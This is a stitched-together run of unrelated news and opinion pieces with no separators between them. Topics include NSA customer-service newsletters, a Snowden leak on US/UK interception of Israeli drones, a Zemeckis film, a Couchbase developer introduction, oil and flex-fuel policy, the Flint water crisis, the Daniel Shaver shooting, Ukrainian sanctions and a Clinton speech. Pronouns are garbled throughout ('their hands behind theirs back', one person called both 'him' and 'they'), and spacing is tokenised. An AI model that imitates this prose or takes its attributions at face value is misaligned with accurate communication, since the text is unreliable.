The series does n't detail what the farm Feds wanted to know , but it was easy to find elsewhere that all the agencies that touch food now make counterterrorism a priority . Not only did a Navy SEAL team reportedly find a trove of Al Qaeda plans to attack our food infrastructure in 2002 , as both Modern Farmer and the FBI 's newsletter have previously reported , but America has already suffered one bioterrorism attack when a cult in Oregon tried to tank voter turnout during a county election with salmonella and local salad bars .
So it 's not as if the farm team had no basis for turning to the NSA . But this series suggests that once the requests started to come , the NSA wanted to make sure they did n't stop . Questions for its analysts come to look like a kind of bureaucratic currency that it could spend to retain its pride of place in the US intelligence arsenal .
This series articulates the NSA 's vision of deepening ties with branches of the federal government . The fourth installment is a case study of its relationship with the UN mission , but one presented as a model for relations with any branch . SIDtoday writes , “ The enterprise-level relationships built by our partnerships have matured from being transactional to relational in nature . ”
So , in the final installment , it operationalizes the customer service team 's strategy to deepen these ties . It both describes how internal committees are structured to identify customer needs that have “ bubbled up ” and how the organization intends to automate action on customer feedback . SIDtoday writes , “ Toward that end , we are embracing processes and technology that will make available the intended outcomes of customer Information Needs … at the touch of a button . ”
The sense one gets from this series is of the NSA 's determination to preserve its status within the government and to grow . Toward that end , another issue details its special team for managing contact with its most important customer , Congress . The legislative team has “ 5 C 's ” for any dealings with legislative offices : “ candid , complete , correct , consistent and corporate . ”
It 's definitely worked .
As the United States transitioned from a Republican to a Democratic administration , the number of ears on the wires has only grown . An early issue of SIDtoday hints at the number of NSA employees ( which is classified ) , saying that more than 5,200 members of its staff are eligible for promotion . According to a 2013 report in The Washington Post , its staff size has increased to something like 33,000 .
Yet it 's not been through some master plan , as the Post article illustrates . It describes the first time the agency used its technology not to listen , but to target . It took a customer to show the organization this capability . Yet rather than wring its hands over the ethical implications , it moved to locate targets as a new service to the military , making itself that much more indispensable .
While there are undoubtedly rivalries among the clandestine services , this customer service report depicts an agency much less interested in one-upping governmental colleagues ( but you should still see Sneakers if you have n't ) and much more interested in “ customers ” ideas about what other kinds of work the NSA might do . It 's true that reports like this could have come out of almost any other government agency , but the fact that unremarkable newsletters came out of a remarkably powerful agency is itself remarkable .
From these newsletters , it looks a bit mundane to be a spy .
Update : DreamWorks Pictures has titled director Robert Zemeckis ' Nov. 21 release as Welcome to Marwen . Steve Carell plays the victim of a brutal attack who finds a unique and therapeutic outlet to help them through their recovery process . The pic is based on Jeff Malmberg 's 2010 documentary , Marwencol , which follows Mark Hogancamp , who after being left brain-damaged and broke , finds recovery in a sixth-scale World War II-era town he 's built in their backyard . Universal is releasing the pic in the five-day Thanksgiving corridor .
Previous April 28 , 2017 : Universal has set November 21 , 2018 as the release date for Oscar winning filmmaker Robert Zemeckis ' untitled project , which stars Steve Carell in the true story of one broken man 's fight as they discover how artistic imagination can restore the human spirit .
Zemeckis co-wrote the screenplay with Caroline Thompson , and will also serve as producer along with Steve Starkey and Jack Rapke of Zemeckis ' Universal-based ImageMovers banner , with DreamWorks Pictures co-financing . Pic is executive produced by Jackie Levine , and Jeff Malmberg , who directed the riveting 2010 documentary , Marwencol , upon which this film is based . In Marwencol , a man by the name of Mark Hogancamp who is left brain-damaged and broke , finds recovery in a sixth-scale World War II-era town he 's built in their backyard .
The Zemeckis ' pic will open against Disney 's Ralph Breaks the Internet : Wreck-It Ralph 2 on Thanksgiving eve . The movie also follows in the wake of Warner Bros. ' Fantastic Beasts sequel and New Regency/20th Century Fox 's Widows directed by Steve McQueen .
The United States and United Kingdom 's intelligence agencies managed to break the encryption on Israel Air Force drone transmissions and for years have been watching what the unmanned aerial vehicles ( UAV ) have been transmitting to their operators .
Follow Ynetnews on Facebook and Twitter
The Americans and Brits were also able to breach other Israeli defense system , such at the Air Force 's F16 fighter jets , the Arrow missile-defense project , and Israel 's military satellites .
The breach was revealed for the first time on Friday morning in documents and photos leaked by former NSA and CIA analyst Edward Snowden , and were exposed at the same time by The Intercept , Der Spiegel and Yedioth Ahronoth .
The release of the document caused an international outcry , and Israeli officials called the US-UK spying operation `` a severe blow to our security . ''
An Israeli drone
According to the documents , Israel is operating a large fleet of UAVs . These drones collect intelligence on the Gaza Strip , the West Bank , and across the Middle East , and have even been used to collect intelligence for a possible Israeli strike in Iran . At least two models of these UAVs are armed with missiles and bombs used for targeted killings . The aircraft operate out of a number of bases in Israel , including Tel Nof , Palmachim , and Ein Shemer .
The documents provide a glimpse into Israel 's world of secrets : its list of targets , objectives , preferences and capabilities , as well as a look through Israel 's eyes at its enemies . In effect , the US and UK have been enjoying Israel 's advanced intelligence capabilities , seeing everything Israel saw .
According to a senior intelligence official , `` This is earth shattering . It means that they stripped us naked and , no less importantly , it likely means none of our encrypted communication measures is truly safe from them . This is the most serious leak in the history of Israeli intelligence . ''
Codename : Anarchist
This massive American-British intelligence operation has been ongoing since 1998 . Its goal is to crack codes and intercept transmission of major militaries in the Middle East , their air forces , and their advanced weapons systems and radars . American and British intelligence agencies were able to break the encryptions on advanced fighting and surveillance systems used by Hezbollah , Egypt , Turkey , Iran , and Syria , but the most resources and efforts behind the operation , codenamed `` Anarchist , '' were invested in Israel .
The operation was run by the American NSA ( National Security Agency ) and its British counterpart , GCHQ ( Government Communications Headquarters ) , out of two bases : Menwith Hill in Britain , a joint surveillance base used by both the UK and US , and the Royal Air Force base in the Troodos Mountains , the highest point in Cyprus . This is a massive base , filled with antennae and interception and decoding apparatus , some located deep underground .
The secret base in Cyprus
The extent of Anarchist 's operations is described in the files Edward Snodwen took from the NSA . The files include screenshots from videos recorded during the drones ' operations , which document everything the powerful cameras saw . Among the files are also PowerPoint presentations and internal memos and tasking orders - apparently for and from senior commanders - about the progress of the operation .
In some of the cases , the Anarchist technicians and analysts knew how to ascertain where the photos were filmed , by decoding a special part of the transmission between the aircraft and the base , in which the drone `` updates '' the base as to where it was . So , for example , on June 24 , 2009 , the Cyprus base documented the movement of Israeli UAVs near Nablus , and near the Palestinian village of Azzun . In April 2010 , they identified drones near Attil .
Spying on Netanyahu
After the 1997 Naval Commando Disaster , in which 12 commandos were killed while on a mission to assassinate a senior official in the Amal Movement , Nasrallah claimed that it was n't a coincidental ambush that led to the commandos ' death , but a planned operation based on accurate intelligence it had obtained . The IDF mocked Nasrallah , saying they were lying and that there was no way for them to know anything about the Naval Commandos ' top secret operations . But it turns out it was actually Nasrallah who was accurate . With a cocky smile , they later presented photos at a press conference from drones that were surveying the Syrian Coastal Mountain Range in the weeks before the raid .
Hezbollah could intercept the drones ' communications and figure out which areas the IDF was showing particular interest in .
In the wake of the Naval Commando disaster , the defense establishment invested `` unprecedented efforts and resources , '' according to an official familiar with the issue , in order to encrypt the frequency of the transmissions between the drones and the base . This was happening while the drone became one of the main tools , if not the central one , used by the Israeli defense establishment to gather intelligence and launch special operations . There is almost no operation in the IDF today , nor many operations in other intelligence agencies , in which a drone does not take some part .
Israel on the radar
Except that now it turns out these efforts were in vain , at least when it comes to the US and Britain who were able to break the sophisticated encryption . A 2008 British intelligence document states with enthusiasm that `` This access ( to Israel 's fleet of drones ) is indispensable for maintaining an understanding of Israeli military training and operations and thus an insight into possible future developments in the region . '' The document further states that `` In times of crisis this access is critical and one of the only avenues to provide up-to-the-minute information and support to US and Allied operations in the area . '' The document , of course , does not deal with the fact that Israel is also among those allies .
The documents show that the US has invested a lot of effort into monitoring Israeli preparations for a possible strike on Iran . The documents also show the immense American concern that Israel , during Prime Minister Netanyahu 's tenure , decides to make significant military moves in the region without coordinating with the US , which could lead to instability .
Last month , the Wall Street Journal revealed that the US has not stopped spying on Netanyahu and their close aides despite President Obama 's decision , in the wake of the leaks from Snowden , to stop spying on friendly heads of states .
According to a former senior official in the American intelligence community , President Obama `` ordered to continue , all the more forcefully , spying on several leaders , primarily Netanyahu . We all understood what that order meant : Obama does n't view Netanyahu as a friendly leader . ''
The new documents only serve to further strengthen the Wall Street Journal 's report , and reveal that since 2009 , at least , the US has not only been spying on the prime minister of Israel and their close circle with a constantly expanding scope , but also has been working to collect particularly confidential information on IDF and intelligence community operations on the most sensitive subjects .
The London headquarters ' instructions to the Anarchist technicians were clear . For example , on July 29 , 2008 , an order was received to follow the operations of Israeli drones in the Golan Heights , the Gaza Strip , the West Bank , and the borders of Lebanon and Syria . Operations in these areas were important , the order said , `` so that assessments can be made on what possible actions maybe ( sic ) taking place . ''
Elsewhere it said that the operations against the Israeli drones should alert the Americans and British of the `` outbreak of hostilities between Israel and Hamas ... our ability to collect and track and report this activity is important for the initial detection and tip-off for any potential pre-emptive or retaliatory strike against Iran . ''
In addition , the documents state , Israel `` provide ( s ) many countries with their UAVs , '' such as India , so its drones ' operations and capabilities must be monitored . The Americans and the British were interested in knowing exactly what type of radar had been mounted on these drones , and not necessarily out of intelligence considerations - rather possibly out of commercial considerations .
Secret armament
The Intercept writers Cora Currier and Henrik Moltke , reported that the IDF censor enforces a strict policy on Israeli media , barring any reports on the use of armed drones as a central part of its targeted killings in the territories , unless when citing non-Israeli media . This time , the site 's report provides unequivocal proof in the form of internal documents and photos from Operation Anarchist .
Some of the photos taken by the Heron ( Eitan ) UAV during takeoff and landing , released for the first time on Friday morning , clearly show missiles attached to the wings of the massive aircraft . According to its specifications , the aircraft is also capable of carrying a payload of up to one ton . This is a big and powerful drone , even more so than the Reaper - the largest drone in the American fleet . Pieter Wezeman , a senior researcher with the Stockholm International Peace Research Institute , confirmed to the Intercept that it 's possible the images are documenting drones that can carry payloads .
`` The images offer rare visual evidence to support reports that Israel flies attack drones — an open secret that the Israeli government wo n't acknowledge , '' the Intercept concludes .
The Hermes 450 drone has been sold to several other countries , and was even used by British forces in Afghanistan and by the American Border Patrol on the Mexican border . In August 2009 , the Anarchist technicians documented a big spike in Israeli drone operations in the Gaza Strip , during which Israel bombed one of the tunnels Hamas had dug on the Israel-Egypt border . Three Hamas militants were killed in the strike .
It was not just transmissions by drones that were decrypted , intercepted and documented . On January 3 , 2008 , while IAF pilots were conducting a series of strikes against Hamas targets in the Gaza Strip , they were unaware of the fact someone else was sitting in the cockpit with them . This was the first time the Americans and the British managed to decrypt Israeli F16 jets transmissions and see everything the pilots could see . The NSA 's internal newsletter proudly told its handful of readers that day that the organization 's analysts were able to crack the transmissions which `` showed a target on the ground being tracked . '' That day , nine Palestinians were killed in Israeli strikes in Gaza .
An Israeli drone
Chris Woods , a world-renowned expert on drone warfare , told Intercept that `` There 's a good chance that we are looking at the first images of an armed Israeli drone in the public domain . '' According to Woods , `` it 's incredible that it took 12 years since the first reported Israeli drone strike in 2004 until these photos came to light . '' In 2012 , a British intelligence analyst reports `` regular collects of Heron TP ( drones ) carrying weapons . ''
In addition , it was revealed that the US and UK 's intelligence service were monitoring the Black Sparrow missile , the target missile used by the Arrow missile-defense program . This allowed the Americans and Brits to gather valuable intel about Black Sparrow .
Black Sparrow is a target missile launched from F15 planes , and in its most common version simulates the launch and flight path of a ballistic missile or a cruise missile . Black Sparrow is produced by Rafael Advanced Defense Systems along with the American Raytheon . The Black Sparrow 's job is to simulate missiles for Arrow tests , and well as other missiles used against Israel . For example , the defense establishment reported that during a special test conducted on April 1 , 2015 , the David 's Sling missile-defense system was able to intercept a Black Sparrow missile in flight .
The monitoring of Black Sparrow was part of a sub-operation of Anarchist , which was codenamed `` Runway . ''
The Arrow missile interceptor .
The documents reveal the many technical details used by the powerful computers in Britain along with the base 's antennas in Cyprus , in order to intercept the drones ' transmissions , and how the analysts there match the way each transmission is decoded to the type of transmission in order to decode it in the best possible manner .
But alongside the intelligence agencies ' extensive capabilities , it was revealed that a part of the decoding process is done with commercial off-the-shelf software anyone can easily obtain and operate . A document titled `` ISUAV Video Descrambling , '' which includes instructs to new soldiers stationed to the base , lists video descrambling programs that should be used in order to improve the quality of the image , include AntiSky and Image Magic .
Der Spiegel raised questions in its Friday issue on a recent deal signed between the Israel Aerospace Industries , Airbus and the German Defense Ministry to lease Heron TP UAVs for German army operations , as from now on all German activities might be exposed to American and British intelligence agencies . German authorities said in response that they intend to use a different encryption system .
The Operation Anarchist documents also expose wide-scale interception of transmissions from Hezbollah , Syria and Iran 's air forces . So , for example , Anarchist technicians monitored Iranian Ababil III drones flying over Syria as part of the aid Iran gives the Assad regime . This information was immediately passed on to the White House . A short while later , the Anarchist technicians received orders from the commanders in Washington that there is `` presidential interest in further samples of the Regime launching attacks upon the general populous ( sic ) . ''
Later , unnamed US officials leaked to the press that the US has unequivocal proof that Iran was providing military aid to Syria , which at the time was dramatic news . A British intelligence report from 2009 determined that `` Iran also has an effective UAV industry and their technology has been exported to a number of terrorist organizations . ''
I just started as a Developer Advocate at Couchbase , so let me tell you a little about myself . I 've been coding since the early 2000s , mainly as a web developer . I live in Grove City , Ohio , which is a suburb of Columbus , Ohio . When I 'm not doing something development-related , I 'm spending time with my family , playing video games , and watching TV .
Before coming to Couchbase , I had always enjoyed interacting with the developer community in my spare time : writing blog posts , making screencasts , speaking at conferences , and so on . Now , with Couchbase , I can do those things full time !
One of the challenges I 'm facing is that I have a lot of learning and catching up to do with the Couchbase technology . I 've been using relational databases almost exclusively for my entire career . I 've mainly used SQL Server ( starting with SQL Server 2000 ) and I 've also used Oracle , MySQL , and SQLite . I 've always been curious about non-relational databases , and now I have a chance to explore them in-depth !
I consider myself an explorer of technologies of all kinds , but my career has mainly been steeped in Microsoft technologies : .NET and C # , and I 've even managed to earn the Microsoft MVP award a few times . So , my focus will be on reaching out to other Microsoft developers .
If that 's you , then now it 's your turn . Tell me a little about yourself ! I 'd especially like to hear from you if you think there is anything that Couchbase can do to make your development experience easier , or if you have a success story involving Couchbase ( or other NoSQL technologies ) . I 'm just starting out , so if you have a tough technical question , I may need to refer you to someone else . But I 'll do my best to get your questions answered no matter what ! If you 're near Central Ohio , I 'd be happy to meet with you or your team in person . Otherwise , you can reach out to me over the internet :
“ Innovation is the ability to see change as an opportunity — not a threat. ” — Steve Jobs
Are we running out of oil ? Are fuel alternatives overrated ? Can fossil fuels become irrelevant ? The recent surge in so-called “ energy ” discussions is astounding . From top news outlets like National Geographic 's “ Great Energy Challenge ” and The New York Times ' “ Wheels ” to niche sites like The Energy Collective and Oil Price , proponents have consciously delegated a space to discuss solutions to some of the most important transportation , electricity generation and environmental issues of our time .
An article by a contributing editor to The Atlantic , Charles C. Mann , is among those believing in the economic significance of fossil fuels . They claim that `` Americans will be less likely to spend trillions on fancy no-oil cars if cheap petroleum is in abundant supply , '' which is debatable for two reasons :
First , new oil is harder to find , takes longer to develop and requires a lot more capital . We are not running out of oil . Although supply is indisputably important , the amount of oil that can be extracted at a reasonable cost should be more of a concern . Oil must be in the range of $ 50 per barrel to sustain economic growth , far below the current level of over $ 100 per barrel . Even when the price of oil in the U.S. ( the WTI ) dips , the price of gasoline does not decrease because it is determined by the international market ( Brent Price ) .
Related article : North Dakota Oil Boom Set to Continue for Some Time
Second , modern technologies to save or displace oil cost far less than oil . Alternatives become highly attractive when considering the entire cost of relying predominantly on oil for transportation , from individual wallets to economic and political stability . Here are some facts :
• In 2012 , the U.S. spent $ 291 billion on imported oil .
• Oil accounts for over half of the nation 's trade deficit .
• The bulk of our national security budget is spent on protecting oil routes in oil-rich regions .
And the list goes on .
Presently , the number of oil rigs operating in the U.S. is at its highest level in almost 30 years . We should reduce our dependence on foreign oil by utilizing our substantial petroleum reserves . Yet , our domestic oil supplies alone can not satisfy our present or future transportation needs . Another error in Mann 's article , along with many others that attempt to tackle our so-called “ energy ” problem , is lumping electricity and transportation fuels together under one synonymous and interchangeable category — energy . When discussing the topic of oil consumption , it is imperative to distinguish electricity from transportation because approximately 71 % of our oil supply fuels transportation .
Lastly , Mann is not wrong to be concerned of costly car conversions and the potential need for new car manufacturing to accommodate abundant replacement fuels . But why not consider fuels that can be easily transported with existing infrastructure , directly used in flex-fuel vehicles with minor engine modifications and blended with gasoline ? Most cars that have been produced over the last five years are already capable of being flex-fuel vehicles that can run on ethanol and gasoline .
Related article : Shell Takes the Lead on Natural Gas , Welcomes the Future of Clean Energy
However , to enable the cars to run on multiple fuels , slight modifications to fuel line seals and other parts and computer reprogramming in the vehicle are required . Ethanol and gasoline flex-fuel capable cars could be converted to support a blend of up to 60 % methanol by merely replacing fuel system seals and o-rings . Support for higher methanol blends can be achieved by modifying an automobile 's spark tables . Late model year non-flexible fuel cars could be converted to flex-fuel by reprogramming their on-board computers to recognize alcohol fuels . Altogether , there are an estimated 50 million cars and trucks that could be converted to run on ethanol , methanol and gasoline blends . In addition , it is not costly to convert vehicles . Most of the associated costs are for the labor that is required to replace the seals with alcohol-compatible products .
Because the role of government in capitalism is to enable markets , our goal should be simply to facilitate an open market that encourages fuel competition . New businesses will compete , prices will fall and innovations will drive efficiency and quality . How do we know such a transformation is possible ? Because it has happened time and again as our free market system has evolved and thrived over hundreds of years . By disregarding the power of competition we are running away from a great opportunity .
By . Zana Nesheiwat
WASHINGTON -- The state-appointed emergency manager who oversaw Flint , Michigan , when its water source was switched to the Flint River says they relied on state and federal experts , but the experts failed them and the city of some 100,000 people .
Darnell Earley says in prepared testimony for the first of two congressional hearings that they were overwhelmed by challenges facing the impoverished city and relied on experts from the Michigan Department of Environmental Quality and U.S. Environmental Protection Agency to advise him .
Former DPS Emergency Manager Darnell Earley . CBS Detroit via DPS
Earley says that for months after the April 2014 switch they believed information they were receiving -- some of it scientifically complex -- was accurate .
But they say in hindsight they should have done more to challenge the experts who told them Flint 's water problems were harmless to human health and geographically limited in nature .
`` In relying on experts , the solutions I oversaw failed to ameliorate the troubles plaguing Flint 's water , '' Earley says in prepared testimony for a hearing Tuesday before the House Oversight and Government Reform Committee .
The Associated Press obtained a copy of Earley 's testimony in advance .
Flint switched its water source from Detroit 's water system to the Flint River in 2014 to save money , but the river water was not treated properly and lead from aging pipes leached into Flint homes and businesses . Elevated levels of lead have been found in some children 's blood , with lead contamination linked to learning disabilities and other problems .
State workers got bottled water long before Flint residents
The chain of events has fueled calls for Republican Gov . Rick Snyder to resign amid outrage over the treatment of the people of Flint , a predominantly African-American city . A recall effort is under way in Michigan for Snyder , who has been widely blamed for the crisis .
The governor is scheduled to appear before the committee on Thursday , along with EPA Administrator Gina McCarthy .
Problems with the Flint River water became apparent soon after the switch was made , Earley says . In August 2014 , tests indicated the presence of fecal matter and other contaminants . Under state guidance , the city issued an advisory telling city residents to boil their water before using it .
But Earley says they were not overly concerned , since they were `` advised by these experts '' that the contaminants were `` generally harmless '' and could be eradicated by adding chlorine and fresh water to the system , which the city did .
Red flags in emails months before Flint water crisis
Earley , a longtime school administrator and municipal official who previously served as city manager in Saginaw , Michigan , took over as emergency manager in Flint in October 2013 -- seven months after the Flint City Council approved the water switch and former emergency manager Edward Kurtz signed it .
Earley said they were given a variety of explanations for the coliform bacteria in the city 's water . Explanations ranged from low-water pressure to an unauthorized connection to a sampling error , they said .
`` I could only understand these reports in conjunction with the scientific interpretations '' provided by state environmental officials and water treatment staff , they said .
`` At absolutely no time during these boil-water advisories were the issues of corrosion control or lead leaching brought to my attention , '' Earley said .
Earley 's testimony comes as the House oversight panel holds two hearings this week on the Flint crisis . Besides Earley , former Flint Mayor Dayne Walling and Susan Hedman , the former head of the EPA 's Midwest regional office , are set to testify . Hedman resigned Feb. 1 as the Flint crisis worsened .
Rep. Jason Chaffetz , R-Utah , chairperson of the oversight panel , visited Flint over the weekend with other lawmakers .
`` What happened in Flint can not ever happen again , '' Chaffetz said in an opening statement prepared for Tuesday 's hearing . `` The people of Flint were being poisoned in their own homes by the water they used every day for drinking and bathing . ''
`` It is almost unbelievable how many bad decisions were made '' in Flint , at all levels of government , Chaffetz said .
FBI investigating Flint water crisis
There was a groundbreaking moment in Flint , Michigan in early March as a plumbing crew dug up a corroded lead pipe outside a home where an expectant mother and an eight-year-old girl live -- and replaced it with a copper pipe .
For the city , that means one down , about 8,000 to go , CBS News reported .
Nurse Toni Larocco spent part of that day in March checking on Stephanie Bradley 's one-year-old daughter Ced-Janae , who tested positive for lead in September .
It was one of five house calls nurses from the Genessee County Health Dept made , part of a city-wide effort to keep track of kids with lead poisoning .
`` It 's gone up huge . Our numbers of families that we 're seeing has exponentially grown , '' Larocco told CBS News .
Bradley says they drank the contaminated water throughout their pregnancy . When they first learned that their daughter had high levels of lead , `` I was very , very afraid because of how young they are and I did n't know the dangers of it . ''
Five months after Flint switched its water supply back to Lake Huron , nearly a thousand homes still have dangerous levels of lead in the water , and 72 children are still testing positive for high lead levels in their blood .
Spread the love
Police were called over reports of a man with a gun in a legal carry state , and within minutes of their arrival , they opened fire on the man—even though they posed no threat , was complying with their commands to the best of their ability , and was even crying and begging the officers to spare their life . In response , the National Rifle Association has been eerily silent .
The organization 's website defines the NRA as “ America 's foremost defender of Second Amendment rights , ” and paints the picture of an association that has been committed to educating and protecting Americans ' Second Amendment rights since the 1870s . However , the NRA also notes that it is “ widely recognized today as a major political force , ” and it appears that politics are keeping the NRA from defending the Second Amendment rights of Americans who are killed by police .
As journalist Radley Balko noted on Twitter , “ The insanely heavy-handed police response to Daniel Shaver came after someone reported seeing them with a rifle . ( it was a pellet gun ) . Arizona is open carry , including for long guns . So the NRA will denounce this verdict and demand better training for Mesa police , right ? “
The insanely heavy-handed police response to Daniel Shaver came after someone reported seeing them with a rifle . ( it was a pellet gun ) . Arizona is open carry , including for long guns . So the NRA will denounce this verdict and demand better training for Mesa police , right ? — Radley Balko ( @ radleybalko ) December 8 , 2017
Daniel Shaver , 26 , was shot and killed by police in Mesa , Arizona , on Jan. 18 , 2016 . The father of two was staying at a hotel on a business trip for their job as a pest control specialist , and they were accompanied by two pellet rifles that were secured in cases , which they used for work .
Shaver invited two other people to their hotel room , where they spent the evening drinking and playing video games . At some point , police received a call saying that they saw someone pointing a rifle out of Shaver 's hotel room window , and officers responded with force .
The full Body Cam footage that documented the time between when officers arrived at the hotel , to when they shot and killed Shaver was only recently released . It shows a horrific scene in which a sobbing man begs for their life and attempts to follow every command , while a police officer points an AR-15 at them with the words “ You 're Fucked ” etched into the side of the rifle .
“ Young man , you are not to move . You are to put your eyes down , look down at the carpet . You are to keep your fingers interlaced behind your head you are to keep your feet crossed , ” Officer Philip Brailsford said . “ If you move , we are going to consider that a threat , and we are going to deal with it and you may not survive it , do you understand me ? ”
“ Yes sir , ” Shaver replied .
After they ordered the woman who was in the room with Shaver to kneel , put their hands in the air , and crawl towards officers where they appear to arrest her , Brailsford ordered Shaver to kneel , and then yelled for them to keep their legs crossed .
“ I 'm sorry , ” Shaver said , putting their hands behind theirs back .
“ Hands up in the air ! ” Brailsford yelled . “ You do that again we 're shooting you , do you understand ? ”
“ Please , do not shoot me , ” Shaver said , keeping their hands in the air .
Shaver continued to follow Brailsford 's instructions , and the officer again warned , “ Your hands go back in the small of your back or down , we are going to shoot you , do you understand me ? ”
“ Yes sir , ” Shaver said , sobbing .
Brailsford then ordered Shaver to crawl towards him , and as the man followed orders , they reached to pull up the waistband of their shorts , and the officer opened fire .
Brailsford fired five consecutive shots , striking and killing Shaver instantly . The police report noted that the “ shots were fired so rapidly that in watching the video at regular speed , one can not count them . ”
Daniel Shaver was not armed as they made every attempt possible to comply with the officer 's demands . The two pellet guns they used for work were found in their hotel room , locked in cases , and there was never any point during their encounter with the police officers where they threatened to harm them , or anyone else .
As The Free Thought Project reported , Philip Brailsford was initially charged with second-degree murder in March 2016 , and then acquitted of all charges last week by a jury that spent just six hours deliberating the verdict . This comes after Brailsford 's lawyers argued that it would be “ extremely unfair ” to show the Body Cam footage of the shooting to the jury .
It was not until after Brailsford had been aquitted that the Body Cam footage was released to the public in its entirety . Despite the fact that the cruel shooting has received national attention , the NRA has remained silent , and has made no attempt to defend Daniel Shaver 's Second Amendment rights .
Earlier this month Ukrainian president Petro Poroshenko dramatically expanded their country 's sanctions against Russia by imposing multiyear sanctions on a number of IT companies . Once they are fully implemented these sanctions will impact some twenty-five million Ukrainians , or nearly every Ukrainian internet user .
These were but the latest in a litany of sanctions that began in 2014 , after Russia annexed Crimea . First , restrictions were imposed on Russian television news programs , then artists , films and , most recently , books published in Russia . Most recently , Ukraine passed a law requiring 75 percent of television content to be in the Ukrainian language—leading one Western journalist to accuse Poroshenko of appearing to “ equate being Ukrainian with speaking Ukrainian . ”
Critics say the government is trying to create a virtual wall around Ukraine , in a futile attempt to keep out all Russian influence . They worry that once this is accomplished , Kiev will seek to impose a nationalist agenda on the country by attacking as disloyal the cultural affinity that most eastern Ukrainians feel for Russia .
Comments such as those by Ukraine 's minister of culture , Yevhen Nyshchuk , who called eastern Ukrainians the products of “ inadequate genetics ” and a “ failure of consciousness , ” or the insistence of the civilian-military governor of the Donetsk region , Pavlo Zhebrivsky , that once it is back under Kiev 's control the government will impose “ a normal democratic agenda on those people , ” by placing a garrison of Ukrainian troops stationed in each of eastern Ukraine 's major cities , only reinforce those fears .
But there are also those who oppose these restrictive measures , because they are impossible to fully implement and are ultimately self-defeating . They point out that one popular banned site , Yandex , is a global enterprise like Google and Bing , and happens to be registered in the Netherlands . Its Ukrainian affiliate , Yandex.Ua , is not only legally separate from its Russian parent , but is also one of Ukraine 's largest taxpayers .
The banning of the country 's most commonly used business software seems particularly odd to many , since it is produced and maintained in Ukraine , and the company just received a certificate from the Ukrainian government saying that the product meets government security standards .
The government justifies its actions with the need to enhance national security in its war with Russia . But even the most sympathetic observers fail to see how denying access to Kiev 's most popular taxi service app , or to the accounting software most Ukrainian businesses use to pay their taxes , improves national security .
What is ultimately much more troubling , however , is that President Poroshenko and their advisors seem incapable of understanding that millions of Ukrainians view such efforts as attacks on their heritage and way of life . Many citizens continue to see Russian cultural and religious identity not as antithetical to their Ukrainian identity , but as complementary to it .
A November 2016 survey by the Razumkov Center in Kiev , widely reported in the Ukrainian press , revealed that more than half of Ukrainians considered Russians and Ukrainians “ brother nations , ” while a quarter described then as “ one people. ” It is not Russian propaganda , but the government 's continuing assaults on their cultural , religious and ethnic identity that sustain the belief , still held by the majority of people in eastern and southern Ukraine , that the 2014 Maidan revolt was an “ illegal military coup d'état . ”
For these Ukrainians , therefore , these are not sanctions against Russia . They are sanctions against them— the “ Other Ukraine ” , which does not agree with the current policy of severing all ties with Russia and rewriting the country 's history .
As proof , they point out that these latest sanctions are just the tip of the iceberg . There are at least four legislative initiatives now under consideration in the Ukrainian parliament to amend the current language law , which is considered too liberal because it permits regions where at least 10 percent speak a second language to adopt that language for official use . After it was adopted in 2012 , nearly half of Ukraine 's regions promptly adopted Russian . Each new proposal , to varying degrees , now seeks to restrict the public use of Russian .
In the same vein , the latest quotas mandating that 75 percent of national prime-time television must be in Ukrainian are clearly not aimed at reducing the presence of the Russian news media in Ukraine—that was banned in early 2014 . Rather , they are aimed at stifling the public voice of Russian-speaking Ukrainians .
In a country where , as recently as 2012 , over 60 percent of newspapers , 83 percent of journals , 87 percent of books and 72 percent of television programs were in Russian , and where over 60 percent say they speak Russian at home and with their friends , the government is sending a clear message of exclusion rather than inclusion . As the speaker of the Ukrainian parliament , Andriy Parubiy , stated before the vote : “ Speech is a weapon , and weapons are not handed over to the enemy . ”
On the positive side , at the insistence of Ukrainian security forces , the parliament took a step back from plunging the country into outright religious warfare by postponing a vote on a law that would have reinstated the Soviet-era practice of having the state supervise the appointment of all senior clerics in the canonical Ukrainian Orthodox Church . It is being targeted by the government because it refuses to disavow its fraternal ties with the Russian Orthodox Church and refers to the current conflict in eastern Ukraine as a “ civil war . ”
Why would the government , which is in the midst of a profound economic and political crisis ( it has had no formal parliamentary majority for more than a year ) , aggravate domestic tensions in this way ? Because stirring up hatred of Russia has short-term political benefits .
First , it creates a reservoir of international support and funding for Ukraine . Second , it shifts domestic attention away from unpopular economic reforms . It also allows Poroshenko—whose popular support has fallen to critical levels —to run as a wartime president . Finally , questioning the loyalty of those who live in the East and South ( not to mention Donbass and Crimea , which are excluded entirely from the political discourse ) preserves the dominance of the nationalist agenda , which is supported mostly in western Ukraine . And even though , back in 2015 , Poroshenko remarked that these regions are “ the basis of Ukrainian statehood , ” in fact this truncated Ukrainian identity , built solely around the history , religion and culture of the westernmost regions of Ukraine , has never sufficed as a basis for national unity .
The current course of denigrating those deemed insufficiently Ukrainian will only lead to a fracturing of the country along ethno-religious lines . This can still be prevented—if the government embraces an inclusive civic culture that respects Ukraine 's bicultural identity .
Whether or not it chooses to do so will determine whether the 2014 Maidan will be remembered as the beginning of a new era of national unity , or the beginning of Ukraine 's disintegration .
Nicolai Petro is Silvia-Chandley Professor of Peace and Nonviolence at the University of Rhode Island . They were a Fulbright Scholar in Ukraine from 2013–14 , and is the editor of Ukraine in Crisis ( Routledge , 2017 ) . They currently reside in Odessa . Josh Cohen is a former USAID project officer involved in managing economic reform projects in the former Soviet Union . They contribute to a number of foreign-policy-focused media outlets and resides in Washington , DC .
Image : President of Ukraine Petro Poroshenko . Wikimedia Commons/Creative Commons/Senate of Poland
Add Hillary Clinton to the list of labor advocates coming after the gig economy .
In their first major speech outlining their economic platform today at New York City 's New School , the Democratic presidential candidate vowed to crack down on `` bosses misclassifying workers as contractors . '' The promise follows a wave of legal action that 's been taken against companies like Uber recently , which argue that drivers should be compensated as employees .
Clinton , who emphasized the need to raise wages throughout their speech , said that businesses that allow people to make extra money by renting a spare room or driving their own car can often threaten solid labor practices . `` This on demand or so-called gig economy is creating exciting opportunities and unleashing innovation , '' they said , `` but it 's also raising hard questions about workplace protection and what a good job will look like in the future . ''
As we grow old we get lost in the never ending circle of Work – Sleep – Work – Go Out – Sleep – Work . We forget about wonder and excitement , we forget about our happy place , we forget that there is a lot more of the world than we make our reality to be .
Do n't worry everybody do this , it 's not just you . Even I ( not that I am someone special but even I , who know these things ) sometimes lose myself in the working lifestyle forgetting completely about what life has to offer .
After everything , We are Just Humans ( I am not saying this in diminutive but we have a tendency to forget ) . We need to be reminded once in a while that there are beautiful places waiting for us to explore , that life is not as limited as we start perceiving it . The best way to remind ourselves is by visiting our happy place .
